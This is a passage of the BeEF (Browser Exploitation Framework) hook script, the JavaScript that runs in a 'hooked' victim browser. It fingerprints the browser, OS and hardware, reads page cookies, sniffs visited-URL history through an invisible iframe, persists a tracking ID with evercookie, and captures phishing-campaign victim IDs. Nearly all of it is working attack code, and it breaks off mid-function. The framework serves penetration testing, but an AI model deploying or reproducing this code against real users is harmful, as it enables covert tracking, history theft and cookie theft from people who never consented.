5204 var veglol = beef.browser.cookie.veganLol();
5205 var has_session_cookies = (beef.browser.cookie.hasSessionCookies(veglol)) ? "Yes" : "No";
5206 var has_persistent_cookies = (beef.browser.cookie.hasPersistentCookies(veglol)) ? "Yes" : "No";
5207 if (cookies) details['Cookies'] = cookies;
5208 if (has_session_cookies) details['hasSessionCookies'] = has_session_cookies;
5209 if (has_persistent_cookies) details['hasPersistentCookies'] = has_persistent_cookies;
5210 } catch (e) {
5211 // the hooked origin is using HttpOnly. EverCookie is persisting the BeEF hook in a different way,
5212 // and there is no reason to read cookies at this point
5213 details['Cookies'] = "Cookies can't be read. The hooked origin is most probably using HttpOnly.";
5214 details['hasSessionCookies'] = "No";
5215 details['hasPersistentCookies'] = "No";
5216 }
5217
5218 if (browser_name) details['BrowserName'] = browser_name;
5219 if (browser_version) details['BrowserVersion'] = browser_version;
5220 if (browser_reported_name) details['BrowserReportedName'] = browser_reported_name;
5221 if (browser_language) details['BrowserLanguage'] = browser_language;
5222 if (page_title) details['PageTitle'] = page_title;
5223 if (page_uri) details['PageURI'] = page_uri;
5224 if (page_referrer) details['PageReferrer'] = page_referrer;
5225 if (hostname) details['HostName'] = hostname;
5226 if (hostport) details['HostPort'] = hostport;
5227 if (browser_plugins) details['BrowserPlugins'] = browser_plugins;
5228 if (os_name) details['OsName'] = os_name;
5229 if (os_version) details['OsVersion'] = os_version;
5230 if (default_browser) details['DefaultBrowser'] = default_browser;
5231 if (hw_name) details['Hardware'] = hw_name;
5232 if (cpu_type) details['CPU'] = cpu_type;
5233 if (touch_enabled) details['TouchEnabled'] = touch_enabled;
5234 if (date_stamp) details['DateStamp'] = date_stamp;
5235 if (browser_platform) details['BrowserPlatform'] = browser_platform;
5236 if (browser_type) details['BrowserType'] = browser_type;
5237 if (screen_size) details['ScreenSize'] = screen_size;
5238 if (window_size) details['WindowSize'] = window_size;
5239 if (vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled;
5240 if (has_flash) details['HasFlash'] = has_flash;
5241 if (has_phonegap) details['HasPhonegap'] = has_phonegap;
5242 if (has_web_socket) details['HasWebSocket'] = has_web_socket;
5243 if (has_googlegears) details['HasGoogleGears'] = has_googlegears;
5244 if (has_webrtc) details['HasWebRTC'] = has_webrtc;
5245 if (has_activex) details['HasActiveX'] = has_activex;
5246 if (has_quicktime) details['HasQuickTime'] = has_quicktime;
5247 if (has_realplayer) details['HasRealPlayer'] = has_realplayer;
5248 if (has_wmp) details['HasWMP'] = has_wmp;
5249
5250 var pf_integration = "";
5251 if (pf_integration) {
5252 var pf_param = "uid";
5253 var pf_victim_uid = "";
5254 var location_search = window.location.search.substring(1);
5255 var params = location_search.split('&');
5256 for (var i = 0; i < params.length; i++) {
5257 var param_entry = params[i].split('=');
5258 if (param_entry[0] == pf_param) {
5259 pf_victim_uid = param_entry[1];
5260 details['PhishingFrenzyUID'] = pf_victim_uid;
5261 break;
5262 }
5263 }
5264 } else {
5265 details['PhishingFrenzyUID'] = "N/A";
5266 }
5267
5268 return details;
5269 },
5270
5271 /**
5272 * Returns boolean value depending on whether the browser supports ActiveX
5273 */
5274 hasActiveX: function () {
5275 return !!window.ActiveXObject;
5276 },
5277
5278 /**
5279 * Returns boolean value depending on whether the browser supports WebRTC
5280 */
5281 hasWebRTC: function () {
5282 return (!!window.mozRTCPeerConnection || !!window.webkitRTCPeerConnection);
5283 },
5284
5285 /**
5286 * Returns boolean value depending on whether the browser supports Silverlight
5287 */
5288 hasSilverlight: function () {
5289 var result = false;
5290
5291 try {
5292 if (beef.browser.isIE()) {
5293 var slControl = new ActiveXObject('AgControl.AgControl');
5294 result = true;
5295 } else if (navigator.plugins["Silverlight Plug-In"]) {
5296 result = true;
5297 }
5298 } catch (e) {
5299 result = false;
5300 }
5301
5302 return result;
5303 },
5304
5305 /**
5306 * Returns array of results, whether or not the target zombie has visited the specified URL
5307 */
5308 hasVisited: function (urls) {
5309 var results = new Array();
5310 var iframe = beef.dom.createInvisibleIframe();
5311 var ifdoc = (iframe.contentDocument) ? iframe.contentDocument : iframe.contentWindow.document;
5312 ifdoc.open();
5313 ifdoc.write('<style>a:visited{width:0px !important;}</style>');
5314 ifdoc.close();
5315 urls = urls.split("\n");
5316 var count = 0;
5317 for (var i in urls) {
5318 var u = urls[i];
5319 if (u != "" || u != null) {
5320 var success = false;
5321 var a = ifdoc.createElement('a');
5322 a.href = u;
5323 ifdoc.body.appendChild(a);
5324 var width = null;
5325 (a.currentStyle) ? width = a.currentStyle['width'] : width = ifdoc.defaultView.getComputedStyle(a, null).getPropertyValue("width");
5326 if (width == '0px') {
5327 success = true;
5328 }
5329 results.push({'url': u, 'visited': success});
5330 count++;
5331 }
5332 }
5333 beef.dom.removeElement(iframe);
5334 if (results.length == 0) {
5335 return false;
5336 }
5337 return results;
5338 },
5339
5340 /**
5341 * Checks if the zombie has Web Sockets enabled.
5342 * @return: {Boolean} true or false.
5343 * In FF6+ the websocket object has been prefixed with Moz, so now it's called MozWebSocket
5344 * */
5345 hasWebSocket: function () {
5346 return !!window.WebSocket || !!window.MozWebSocket;
5347 },
5348
5349 /**
5350 * Checks if the zombie has Google Gears installed.
5351 * @return: {Boolean} true or false.
5352 *
5353 * @from: https://code.google.com/apis/gears/gears_init.js
5354 * */
5355 hasGoogleGears: function () {
5356
5357 var ggfactory = null;
5358
5359 // Chrome
5360 if (window.google && google.gears) return true;
5361
5362 // Firefox
5363 if (typeof GearsFactory != 'undefined') {
5364 ggfactory = new GearsFactory();
5365 } else {
5366 // IE
5367 try {
5368 ggfactory = new ActiveXObject('Gears.Factory');
5369 // IE Mobile on WinCE.
5370 if (ggfactory.getBuildInfo().indexOf('ie_mobile') != -1) {
5371 ggfactory.privateSetGlobalObject(this);
5372 }
5373 } catch (e) {
5374 // Safari
5375 if ((typeof navigator.mimeTypes != 'undefined')
5376 && navigator.mimeTypes["application/x-googlegears"]) {
5377 ggfactory = document.createElement("object");
5378 ggfactory.style.display = "none";
5379 ggfactory.width = 0;
5380 ggfactory.height = 0;
5381 ggfactory.type = "application/x-googlegears";
5382 document.documentElement.appendChild(ggfactory);
5383 if (ggfactory && (typeof ggfactory.create == 'undefined')) ggfactory = null;
5384 }
5385 }
5386 }
5387 if (!ggfactory) return false; else return true;
5388 },
5389
5390 /**
5391 * Checks if the zombie has Foxit PDF reader plugin.
5392 * @return: {Boolean} true or false.
5393 *
5394 * @example: if(beef.browser.hasFoxit()) { ... }
5395 * */
5396 hasFoxit: function () {
5397
5398 var foxitplugin = false;
5399
5400 try {
5401 if (beef.browser.isIE()) {
5402 var foxitControl = new ActiveXObject('FoxitReader.FoxitReaderCtl.1');
5403 foxitplugin = true;
5404 } else if (navigator.plugins['Foxit Reader Plugin for Mozilla']) {
5405 foxitplugin = true;
5406 }
5407 } catch (e) {
5408 foxitplugin = false;
5409 }
5410
5411 return foxitplugin;
5412 },
5413
5414 /**
5415 * Returns the page head HTML
5416 **/
5417 getPageHead: function () {
5418 var html_head;
5419 try {
5420 html_head = document.head.innerHTML.toString();
5421 } catch (e) {
5422 }
5423 return html_head;
5424 },
5425
5426 /**
5427 * Returns the page body HTML
5428 **/
5429 getPageBody: function () {
5430 var html_body;
5431 try {
5432 html_body = document.body.innerHTML.toString();
5433 } catch (e) {
5434 }
5435 return html_body;
5436 },
5437
5438 /**
5439 * Dynamically changes the favicon: works in Firefox, Chrome and Opera
5440 **/
5441 changeFavicon: function (favicon_url) {
5442 var iframe = null;
5443 if (this.isC()) {
5444 iframe = document.createElement('iframe');
5445 iframe.src = 'about:blank';
5446 iframe.style.display = 'none';
5447 document.body.appendChild(iframe);
5448 }
5449 var link = document.createElement('link'),
5450 oldLink = document.getElementById('dynamic-favicon');
5451 link.id = 'dynamic-favicon';
5452 link.rel = 'shortcut icon';
5453 link.href = favicon_url;
5454 if (oldLink) document.head.removeChild(oldLink);
5455 document.head.appendChild(link);
5456 if (this.isC()) iframe.src += '';
5457 },
5458
5459 /**
5460 * Changes page title
5461 **/
5462 changePageTitle: function (title) {
5463 document.title = title;
5464 },
5465
5466 /**
5467 * Get the browser language
5468 */
5469 getBrowserLanguage: function () {
5470 var l = 'Unknown';
5471 try {
5472 l = window.navigator.userLanguage || window.navigator.language;
5473 } catch (e) {
5474 }
5475 return l;
5476 },
5477
5478 /**
5479 * A function that gets the max number of simultaneous connections the
5480 * browser can make per origin, or globally on all origin.
5481 *
5482 * This code is based on research from browserspy.dk
5483 *
5484 * @parameter {ENUM: 'PER_DOMAIN', 'GLOBAL'=>default}
5485 * @return {Deferred promise} A jQuery deferred object promise, which when resolved passes
5486 * the number of connections to the callback function as "this"
5487 *
5488 * example usage:
5489 * $j.when(getMaxConnections()).done(function(){
5490 * console.debug("Max Connections: " + this);
5491 * });
5492 *
5493 */
5494 getMaxConnections: function (scope) {
5495
5496 var imagesCount = 30; // Max number of images to test
5497 var secondsTimeout = 5; // Image load timeout threashold
5498 var testUrl = ""; // The image testing service URL
5499
5500 // User broserspy.dk max connections service URL.
5501 if (scope == 'PER_DOMAIN')
5502 testUrl = "http://browserspy.dk/connections.php?img=1&random=";
5503 else
5504 // The token will be replaced by a different number with each request (different origin).
5505 testUrl = "http://<token>.browserspy.dk/connections.php?img=1&random=";
5506
5507 var imagesLoaded = 0; // Number of responding images before timeout.
5508 var imagesRequested = 0; // Number of requested images.
5509 var testImages = new Array(); // Array of all images.
5510 var deferredObject = $j.Deferred(); // A jquery Deferred object.
5511
5512 for (var i = 1; i <= imagesCount; i++) {
5513 // Asynchronously request image.
5514 testImages[i] =
5515 $j.ajax({
5516 type: "get",
5517 dataType: true,
5518 url: (testUrl.replace("<token>", i)) + Math.random(),
5519 data: "",
5520 timeout: (secondsTimeout * 1000),
5521
5522 // Function on completion of request.
5523 complete: function (jqXHR, textStatus) {
5524
5525 imagesRequested++;
5526
5527 // If the image returns a 200 or a 302, the text Status is "error", else null
5528 if (textStatus == "error") {
5529 imagesLoaded++;
5530 }
5531
5532 // If all images requested
5533 if (imagesRequested >= imagesCount) {
5534 // resolve the deferred object passing the number of loaded images.
5535 deferredObject.resolveWith(imagesLoaded);
5536 }
5537 }
5538 });
5539
5540 }
5541
5542 // Return a promise to resolve the deffered object when the images are loaded.
5543 return deferredObject.promise();
5544
5545 }
5546
5547};
5548
5549beef.regCmp('beef.browser');
5550
5551
5552//
5553// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
5554// Browser Exploitation Framework (BeEF) - http://beefproject.com
5555// See the file 'doc/COPYING' for copying permission
5556//
5557
5558/*!
5559 * @literal object: beef.browser.cookie
5560 *
5561 * Provides fuctions for working with cookies.
5562 * Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php
5563 * Original author unknown.
5564 *
5565 */
5566beef.browser.cookie = {
5567
5568 setCookie: function (name, value, expires, path, domain, secure)
5569 {
5570
5571 var today = new Date();
5572 today.setTime( today.getTime() );
5573
5574 if ( expires )
5575 {
5576 expires = expires * 1000 * 60 * 60 * 24;
5577 }
5578 var expires_date = new Date( today.getTime() + (expires) );
5579
5580 document.cookie = name + "=" +escape( value ) +
5581 ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
5582 ( ( path ) ? ";path=" + path : "" ) +
5583 ( ( domain ) ? ";domain=" + domain : "" ) +
5584 ( ( secure ) ? ";secure" : "" );
5585 },
5586
5587 getCookie: function(name)
5588 {
5589 var a_all_cookies = document.cookie.split( ';' );
5590 var a_temp_cookie = '';
5591 var cookie_name = '';
5592 var cookie_value = '';
5593 var b_cookie_found = false;
5594
5595 for ( i = 0; i < a_all_cookies.length; i++ )
5596 {
5597 a_temp_cookie = a_all_cookies[i].split( '=' );
5598 cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
5599 if ( cookie_name == name )
5600 {
5601 b_cookie_found = true;
5602 if ( a_temp_cookie.length > 1 )
5603 {
5604 cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
5605 }
5606 return cookie_value;
5607 break;
5608 }
5609 a_temp_cookie = null;
5610 cookie_name = '';
5611 }
5612 if ( !b_cookie_found )
5613 {
5614 return null;
5615 }
5616 },
5617
5618 deleteCookie: function (name, path, domain)
5619 {
5620 if ( this.getCookie(name) ) document.cookie = name + "=" +
5621 ( ( path ) ? ";path=" + path : "") +
5622 ( ( domain ) ? ";domain=" + domain : "" ) +
5623 ";expires=Thu, 01-Jan-1970 00:00:01 GMT";
5624 },
5625
5626 veganLol: function (){
5627 var to_hell= '';
5628 var min = 17;
5629 var max = 25;
5630 var lol_length = Math.floor(Math.random() * (max - min + 1)) + min;
5631
5632 var grunt = function(){
5633 var moo = Math.floor(Math.random() * 62);
5634 var char = '';
5635 if(moo < 36){
5636 char = String.fromCharCode(moo + 55);
5637 }else{
5638 char = String.fromCharCode(moo + 61);
5639 }
5640 if(char != ';' && char != '='){
5641 return char;
5642 }else{
5643 return 'x';
5644 }
5645 };
5646
5647 while(to_hell.length < lol_length){
5648 to_hell += grunt();
5649 }
5650 return to_hell;
5651 },
5652
5653 hasSessionCookies: function (name){
5654 this.setCookie( name, beef.browser.cookie.veganLol(), '', '/', '', '' );
5655
5656 cookiesEnabled = (this.getCookie(name) == null)? false:true;
5657 this.deleteCookie(name, '/', '');
5658 return cookiesEnabled;
5659
5660 },
5661
5662 hasPersistentCookies: function (name){
5663 this.setCookie( name, beef.browser.cookie.veganLol(), 1, '/', '', '' );
5664
5665 cookiesEnabled = (this.getCookie(name) == null)? false:true;
5666 this.deleteCookie(name, '/', '');
5667 return cookiesEnabled;
5668
5669 }
5670
5671};
5672
5673beef.regCmp('beef.browser.cookie');
5674
5675//
5676// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
5677// Browser Exploitation Framework (BeEF) - http://beefproject.com
5678// See the file 'doc/COPYING' for copying permission
5679//
5680
5681/*!
5682 * @literal object: beef.browser.popup
5683 *
5684 * Provides fuctions for working with cookies.
5685 * Several functions adopted from http://davidwalsh.name/popup-block-javascript
5686 * Original author unknown.
5687 *
5688 */
5689beef.browser.popup = {
5690
5691 blocker_enabled: function ()
5692 {
5693 screenParams = beef.browser.getScreenSize();
5694 var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
5695 if (popUp == null || typeof(popUp)=='undefined') {
5696 return true;
5697 } else {
5698 popUp.close();
5699 return false;
5700 }
5701 }
5702};
5703
5704beef.regCmp('beef.browser.popup');
5705
5706
5707//
5708// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
5709// Browser Exploitation Framework (BeEF) - http://beefproject.com
5710// See the file 'doc/COPYING' for copying permission
5711//
5712
5713/*!
5714 * @literal object: beef.session
5715 *
5716 * Provides basic session functions.
5717 */
5718beef.session = {
5719
5720 hook_session_id_length: 80,
5721 hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
5722 ec: new evercookie(),
5723 beefhook: "BEEFHOOK",
5724
5725 /**
5726 * Gets a string which will be used to identify the hooked browser session
5727 *
5728 * @example: var hook_session_id = beef.session.get_hook_session_id();
5729 */
5730 get_hook_session_id: function() {
5731 // check if the browser is already known to the framework
5732 var id = this.ec.evercookie_cookie(beef.session.beefhook);
5733 if (typeof id == 'undefined') {
5734 var id = this.ec.evercookie_userdata(beef.session.beefhook);
5735 }
5736 if (typeof id == 'undefined') {
5737 var id = this.ec.evercookie_window(beef.session.beefhook);
5738 }
5739
5740 // if the browser is not known create a hook session id and set it
5741 if ((typeof id == 'undefined') || (id == null)) {
5742 id = this.gen_hook_session_id();
5743 this.set_hook_session_id(id);
5744 }
5745
5746 // return the hooked browser session identifier
5747 return id;
5748 },
5749
5750 /**
5751 * Sets a string which will be used to identify the hooked browser session
5752 *
5753 * @example: beef.session.set_hook_session_id('RANDOMSTRING');
5754 */
5755 set_hook_session_id: function(id) {
5756 // persist the hook session id
5757 this.ec.evercookie_cookie(beef.session.beefhook, id);
5758 this.ec.evercookie_userdata(beef.session.beefhook, id);
5759 this.ec.evercookie_window(beef.session.beefhook, id);
5760 },
5761
5762 /**
5763 * Generates a random string using the chars in hook_session_id_chars.
5764 *
5765 * @example: beef.session.gen_hook_session_id();
5766 */
5767 gen_hook_session_id: function() {
5768 // init the return value
5769 var hook_session_id = "";
5770
5771 // construct the random string
5772 for(var i=0; i<this.hook_session_id_length; i++) {
5773 var rand_num = Math.floor(Math.random()*this.hook_session_id_chars.length);
5774 hook_session_id += this.hook_session_id_chars.charAt(rand_num);
5775 }
5776
5777 return hook_session_id;
5778 }
5779};
5780
5781beef.regCmp('beef.session');
5782
5783
5784//
5785// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
5786// Browser Exploitation Framework (BeEF) - http://beefproject.com
5787// See the file 'doc/COPYING' for copying permission
5788//
5789
5790beef.os = {
5791
5792 ua: navigator.userAgent,
5793
5794 /**
5795 * Detect default browser (IE only)
5796 * Written by unsticky
5797 * http://ha.ckers.org/blog/20070319/detecting-default-browser-in-ie/
5798 */
5799 getDefaultBrowser: function() {
5800 var result = "Unknown"
5801 try {
5802 var mt = document.mimeType;
5803 if (mt) {
5804 if (mt == "Safari Document") result = "Safari";
5805 if (mt == "Firefox HTML Document") result = "Firefox";
5806 if (mt == "Chrome HTML Document") result = "Chrome";
5807 if (mt == "HTML Document") result = "Internet Explorer";
5808 if (mt == "Opera Web Document") result = "Opera";
5809 }
5810 } catch (e) {
5811 beef.debug("[os] getDefaultBrowser: "+e.message);
5812 }
5813 return result;
5814 },
5815
5816 // the likelihood that we hook Windows 3.11 (which has only Win in the UA string) is zero in 2015
5817 isWin311: function() {
5818 return (this.ua.match('(Win16)')) ? true : false;
5819 },
5820
5821 isWinNT4: function() {
5822 return (this.ua.match('(Windows NT 4.0)')) ? true : false;
5823 },
5824
5825 isWin95: function() {
5826 return (this.ua.match('(Windows 95)|(Win95)|(Windows_95)')) ? true : false;
5827 },
5828 isWinCE: function() {
5829 return (this.ua.match('(Windows CE)')) ? true : false;
5830 },
5831
5832 isWin98: function() {
5833 return (this.ua.match('(Windows 98)|(Win98)')) ? true : false;
5834 },
5835
5836 isWinME: function() {
5837 return (this.ua.match('(Windows ME)|(Win 9x 4.90)')) ? true : false;
5838 },
5839
5840 isWin2000: function() {
5841 return (this.ua.match('(Windows NT 5.0)|(Windows 2000)')) ? true : false;
5842 },
5843
5844 isWin2000SP1: function() {
5845 return (this.ua.match('Windows NT 5.01 ')) ? true : false;
5846 },
5847
5848 isWinXP: function() {
5849 return (this.ua.match('(Windows NT 5.1)|(Windows XP)')) ? true : false;
5850 },
5851
5852 isWinServer2003: function() {
5853 return (this.ua.match('(Windows NT 5.2)')) ? true : false;
5854 },
5855
5856 isWinVista: function() {
5857 return (this.ua.match('(Windows NT 6.0)')) ? true : false;
5858 },
5859
5860 isWin7: function() {
5861 return (this.ua.match('(Windows NT 6.1)|(Windows NT 7.0)')) ? true : false;
5862 },
5863
5864 isWin8: function() {
5865 return (this.ua.match('(Windows NT 6.2)')) ? true : false;
5866 },
5867
5868 isWin81: function() {
5869 return (this.ua.match('(Windows NT 6.3)')) ? true : false;
5870 },
5871
5872 isOpenBSD: function() {
5873 return (this.ua.indexOf('OpenBSD') != -1) ? true : false;
5874 },
5875
5876 isSunOS: function() {
5877 return (this.ua.indexOf('SunOS') != -1) ? true : false;
5878 },
5879
5880 isLinux: function() {
5881 return (this.ua.match('(Linux)|(X11)')) ? true : false;
5882 },
5883
5884 isMacintosh: function() {
5885 return (this.ua.match('(Mac_PowerPC)|(Macintosh)|(MacIntel)')) ? true : false;
5886 },
5887
5888 isOsxYosemite: function(){ // TODO
5889 return (this.ua.match('(OS X 10_10)|(OS X 10.10)')) ? true : false;
5890 },
5891 isOsxMavericks: function(){ // TODO
5892 return (this.ua.match('(OS X 10_9)|(OS X 10.9)')) ? true : false;
5893 },
5894 isOsxSnowLeopard: function(){ // TODO
5895 return (this.ua.match('(OS X 10_8)|(OS X 10.8)')) ? true : false;
5896 },
5897 isOsxLeopard: function(){ // TODO
5898 return (this.ua.match('(OS X 10_7)|(OS X 10.7)')) ? true : false;
5899 },
5900
5901 isWinPhone: function() {
5902 return (this.ua.match('(Windows Phone)')) ? true : false;
5903 },
5904
5905 isIphone: function() {
5906 return (this.ua.indexOf('iPhone') != -1) ? true : false;
5907 },
5908
5909 isIpad: function() {
5910 return (this.ua.indexOf('iPad') != -1) ? true : false;
5911 },
5912
5913 isIpod: function() {
5914 return (this.ua.indexOf('iPod') != -1) ? true : false;
5915 },
5916
5917 isNokia: function() {
5918 return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
5919 },
5920
5921 isAndroid: function() {
5922 return (this.ua.match('Android')) ? true : false;
5923 },
5924
5925 isBlackBerry: function() {
5926 return (this.ua.match('BlackBerry')) ? true : false;
5927 },
5928
5929 isWebOS: function() {
5930 return (this.ua.match('webOS')) ? true : false;
5931 },
5932
5933 isQNX: function() {
5934 return (this.ua.match('QNX')) ? true : false;
5935 },
5936
5937 isBeOS: function() {
5938 return (this.ua.match('BeOS')) ? true : false;
5939 },
5940
5941 isWindows: function() {
5942 return (this.ua.match('Windows')) ? true : false;
5943 },
5944
5945 getName: function() {
5946
5947 if(this.isWindows()){
5948 return 'Windows';
5949 }
5950
5951 if(this.isMacintosh()) {
5952 return 'OSX';
5953 }
5954
5955 //Nokia
5956 if(this.isNokia()) {
5957 if (this.ua.indexOf('Maemo Browser') != -1) return 'Maemo';
5958 if (this.ua.match('(SymbianOS)|(Symbian OS)')) return 'SymbianOS';
5959 if (this.ua.indexOf('Symbian') != -1) return 'Symbian';
5960 }
5961
5962 // BlackBerry
5963 if(this.isBlackBerry()) return 'BlackBerry OS';
5964
5965 // Android
5966 if(this.isAndroid()) return 'Android';
5967
5968 // SunOS
5969 if(this.isSunOS()) return 'SunOS';
5970
5971 //Linux
5972 if(this.isLinux()) return 'Linux';
5973
5974 //iPhone
5975 if (this.isIphone()) return 'iOS';
5976 //iPad
5977 if (this.isIpad()) return 'iOS';
5978 //iPod
5979 if (this.isIpod()) return 'iOS';
5980
5981 //others
5982 if(this.isQNX()) return 'QNX';
5983 if(this.isBeOS()) return 'BeOS';
5984 if(this.isWebOS()) return 'webOS';
5985
5986 return 'unknown';
5987 },
5988
5989 getVersion: function(){
5990 //Windows
5991 if(this.isWindows()) {
5992 if (this.isWin81()) return '8.1';
5993 if (this.isWin8()) return '8';
5994 if (this.isWin7()) return '7';
5995 if (this.isWinVista()) return 'Vista';
5996 if (this.isWinXP()) return 'XP';
5997 if (this.isWinServer2003()) return 'Server 2003';
5998 if (this.isWin2000SP1()) return '2000 SP1';
5999 if (this.isWin2000()) return '2000';
6000 if (this.isWinME()) return 'Millenium';
6001
6002 if (this.isWinNT4()) return 'NT 4';
6003 if (this.isWinCE()) return 'CE';
6004 if (this.isWin95()) return '95';
6005 if (this.isWin98()) return '98';
6006 }
6007
6008 // OS X
6009 if(this.isMacintosh()) {
6010 if (this.isOsxYosemite()) return '10.10';
6011 if (this.isOsxMavericks()) return '10.9';
6012 if (this.isOsxSnowLeopard()) return '10.8';
6013 if (this.isOsxLeopard()) return '10.7';
6014 }
6015
6016 // TODO add Android/iOS version detection
6017 }
6018};
6019
6020beef.regCmp('beef.net.os');
6021
6022
6023//
6024// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
6025// Browser Exploitation Framework (BeEF) - http://beefproject.com
6026// See the file 'doc/COPYING' for copying permission
6027//
6028
6029beef.hardware = {
6030
6031 ua: navigator.userAgent,
6032
6033 /*
6034 * @return: {String} CPU type
6035 **/
6036 cpuType: function() {
6037 var arch = 'UNKNOWN';
6038 // note that actually WOW64 means IE 32bit and Windows 64 bit. we are more interested
6039 // in detecting the OS arch rather than the browser build
6040 if (navigator.userAgent.match('(WOW64|x64|x86_64)') || navigator.platform.toLowerCase() == "win64"){
6041 arch = 'x86_64';
6042 }else if(typeof navigator.cpuClass != 'undefined'){
6043 switch (navigator.cpuClass) {
6044 case '68K':
6045 arch = 'Motorola 68K';
6046 break;
6047 case 'PPC':
6048 arch = 'Motorola PPC';
6049 break;
6050 case 'Digital':
6051 arch = 'Alpha';
6052 break;
6053 default:
6054 arch = 'x86';
6055 }
6056 }
6057 // TODO we can infer the OS is 64 bit, if we first detect the OS type (os.js).
6058 // For example, if OSX is at least 10.7, most certainly is 64 bit.
6059 return arch;
6060 },
6061
6062 /*
6063 * @return: {Boolean} true or false.
6064 **/
6065 isTouchEnabled: function() {
6066 if ('ontouchstart' in document) return true;
6067 return false;
6068 },
6069
6070 /*
6071 * @return: {Boolean} true or false.
6072 **/
6073 isVirtualMachine: function() {
6074 if (screen.width % 2 || screen.height % 2) return true;
6075 return false;
6076 },
6077
6078 /*
6079 * @return: {Boolean} true or false.
6080 **/
6081 isLaptop: function() {
6082 // Most common laptop screen resolution
6083 if (screen.width == 1366 && screen.height == 768) return true;
6084 // Netbooks
6085 if (screen.width == 1024 && screen.height == 600) return true;
6086 return false;
6087 },
6088
6089 /*
6090 * @return: {Boolean} true or false.
6091 **/
6092 isNokia: function() {
6093 return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
6094 },
6095
6096 /*
6097 * @return: {Boolean} true or false.
6098 **/
6099 isZune: function() {
6100 return (this.ua.match('ZuneWP7')) ? true : false;
6101 },
6102
6103 /*
6104 * @return: {Boolean} true or false.
6105 **/
6106 isHtc: function() {
6107 return (this.ua.match('HTC')) ? true : false;
6108 },
6109
6110 /*
6111 * @return: {Boolean} true or false.
6112 **/
6113 isEricsson: function() {
6114 return (this.ua.match('Ericsson')) ? true : false;
6115 },
6116
6117 /*
6118 * @return: {Boolean} true or false.
6119 **/
6120 isMotorola: function() {
6121 return (this.ua.match('Motorola')) ? true : false;
6122 },
6123
6124 /*
6125 * @return: {Boolean} true or false.
6126 **/
6127 isGoogle: function() {
6128 return (this.ua.match('Nexus One')) ? true : false;
6129 },
6130
6131 /**
6132 * Returns true if the browser is on a Mobile Phone
6133 * @return: {Boolean} true or false
6134 *
6135 * @example: if(beef.hardware.isMobilePhone()) { ... }
6136 **/
6137 isMobilePhone: function() {
6138 return DetectMobileQuick();
6139 },
6140
6141 getName: function() {
6142 var ua = navigator.userAgent.toLowerCase();
6143 if(DetectIphone()) { return "iPhone"};
6144 if(DetectIpod()) { return "iPod Touch"};
6145 if(DetectIpad()) { return "iPad"};
6146 if (this.isHtc()) { return 'HTC'};
6147 if (this.isMotorola()) { return 'Motorola'};
6148 if (this.isZune()) { return 'Zune'};
6149 if (this.isGoogle()) { return 'Google Nexus One'};
6150 if (this.isEricsson()) { return 'Ericsson'};
6151 if(DetectAndroidPhone()) { return "Android Phone"};
6152 if(DetectAndroidTablet()) { return "Android Tablet"};
6153 if(DetectS60OssBrowser()) { return "Nokia S60 Open Source"};
6154 if(ua.search(deviceS60) > -1) { return "Nokia S60"};
6155 if(ua.search(deviceS70) > -1) { return "Nokia S70"};
6156 if(ua.search(deviceS80) > -1) { return "Nokia S80"};
6157 if(ua.search(deviceS90) > -1) { return "Nokia S90"};
6158 if(ua.search(deviceSymbian) > -1) { return "Nokia Symbian"};
6159 if (this.isNokia()) { return 'Nokia'};
6160 if(DetectWindowsPhone7()) { return "Windows Phone 7"};
6161 if(DetectWindowsMobile()) { return "Windows Mobile"};
6162 if(DetectBlackBerryTablet()) { return "BlackBerry Tablet"};
6163 if(DetectBlackBerryWebKit()) { return "BlackBerry OS 6"};
6164 if(DetectBlackBerryTouch()) { return "BlackBerry Touch"};
6165 if(DetectBlackBerryHigh()) { return "BlackBerry OS 5"};
6166 if(DetectBlackBerry()) { return "BlackBerry"};
6167 if(DetectPalmOS()) { return "Palm OS"};
6168 if(DetectPalmWebOS()) { return "Palm Web OS"};
6169 if(DetectGarminNuvifone()) { return "Gamin Nuvifone"};
6170 if(DetectArchos()) { return "Archos"}
6171 if(DetectBrewDevice()) { return "Brew"};
6172 if(DetectDangerHiptop()) { return "Danger Hiptop"};
6173 if(DetectMaemoTablet()) { return "Maemo Tablet"};
6174 if(DetectSonyMylo()) { return "Sony Mylo"};
6175 if(DetectAmazonSilk()) { return "Kindle Fire"};
6176 if(DetectKindle()) { return "Kindle"};
6177 if(DetectSonyPlaystation()) { return "Playstation"};
6178 if(ua.search(deviceNintendoDs) > -1) { return "Nintendo DS"};
6179 if(ua.search(deviceWii) > -1) { return "Nintendo Wii"};
6180 if(ua.search(deviceNintendo) > -1) { return "Nintendo"};
6181 if(DetectXbox()) { return "Xbox"};
6182 if(this.isLaptop()) { return "Laptop"};
6183 if(this.isVirtualMachine()) { return "Virtual Machine"};
6184
6185 return 'Unknown';
6186 }
6187};
6188
6189beef.regCmp('beef.hardware');
6190
6191
6192//
6193// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
6194// Browser Exploitation Framework (BeEF) - http://beefproject.com
6195// See the file 'doc/COPYING' for copying permission
6196//
6197
6198/*!
6199 * @literal object: beef.dom
6200 *
6201 * Provides functionality to manipulate the DOM.
6202 */
6203beef.dom = {
6204
6205 /**
6206 * Generates a random ID for HTML elements
6207 * @param: {String} prefix: a custom prefix before the random id. defaults to "beef-"
6208 * @return: generated id
6209 */
6210 generateID: function(prefix) {
6211 return ((prefix == null) ? 'beef-' : prefix)+Math.floor(Math.random()*99999);
6212 },
6213
6214 /**
6215 * Creates a new element but does not append it to the DOM.
6216 * @param: {String} the name of the element.
6217 * @param: {Literal Object} the attributes of that element.
6218 * @return: the created element.
6219 */
6220 createElement: function(type, attributes) {
6221 var el = document.createElement(type);
6222
6223 for(index in attributes) {
